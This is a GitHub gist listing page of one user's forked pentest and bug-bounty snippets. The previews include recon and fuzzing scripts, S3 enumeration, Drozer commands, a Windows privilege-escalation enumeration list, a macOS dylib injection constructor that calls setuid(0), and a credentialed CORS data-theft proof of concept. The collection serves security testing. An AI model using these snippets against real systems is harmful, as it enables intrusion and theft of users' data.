Skip to content

Instantly share code, notes, and snippets.

View michaellcader's full-sized avatar
🏠
Working from home

MichaellCader michaellcader

🏠
Working from home
39 followers · 40 following
View GitHub Profile
@michaellcader
michaellcader / nuclei-scan.sh
Last active July 9, 2020 06:26 — forked from dwisiswant0/nuclei-scan.sh
Automate nuclei for given hosts
#!/bin/bash
OUT=~/nuclei-results/$1
TPL=~/nuclei-templates
mkdir -p ${OUT}
SUB=$(subfinder -d $1 -silent | httprobe | tee ${OUT}/$1.txt)
cd ${TPL}; git pull origin master && cd -
for tpl in $(find $TPL -name "*.yaml"); do $GOPATH/bin/nuclei -l ${OUT}/$1.txt -t $tpl -o "${OUT}/$(basename "$tpl" .yaml).txt"; done
find ${OUT} -name "*.txt" -size 0 -delete
@michaellcader
michaellcader / tmux-cheatsheet.markdown
Created July 18, 2020 14:15 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@michaellcader
michaellcader / subdomain_wordlist.md
Created August 25, 2020 12:07 — forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
@michaellcader
michaellcader / ffuf.sh
Created August 25, 2020 12:10 — forked from noobsdt/ffuf.sh
#!/bin/bash
echo "###############################"
echo "# Ffuf #"
echo "###############################"
echo ""
echo ""
echo "[1] subdomains.txt"
echo "[2] subdomain-large.txt"
echo "[3] raft-large-directories.txt"
@michaellcader
michaellcader / ffuf to enumerate s3
Last active June 2, 2022 03:19 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
[ffuf usage] Use wfuzz or ffuf to enumerate s3 #bugbounty
#!/bin/bash
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@michaellcader
michaellcader / Drozer_command.md
Last active June 2, 2022 03:26 — forked from castexyz/drozer.md
[mobile]Drozer commands #bugbounty

Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

    * Starting a session
      * `adb forward tcp:31415 tcp:31415`
      * `drozer console connect`
      * `drozer console connect --server <ip>`
    * List modules
 * `ls`
@michaellcader
michaellcader / inject.c
Created July 14, 2022 13:34 — forked from theevilbit/inject.c
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
setuid(0);
system("id");
printf("Hello from dylib!\n");
@michaellcader
michaellcader / windows_privesc
Created August 5, 2022 06:28 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
@michaellcader
michaellcader / CORS.html
Created August 14, 2022 08:27
pocs
# GET Method
<script type="text/javascript">
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","victim.com/getUserInfo",true);
req.withCredentials = true;
req.send();
function reqListener(){alert(req.responseText);}
</script>
@michaellcader
michaellcader / unwxapkg.py
Created September 8, 2022 06:41 — forked from Integ/unwxapkg.py
A useful tool for unpack wxapkg file with python3 surport.
# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename
__author__ = 'Integ: https://github.com./integ'
import sys, os
import struct
class WxapkgFile(object):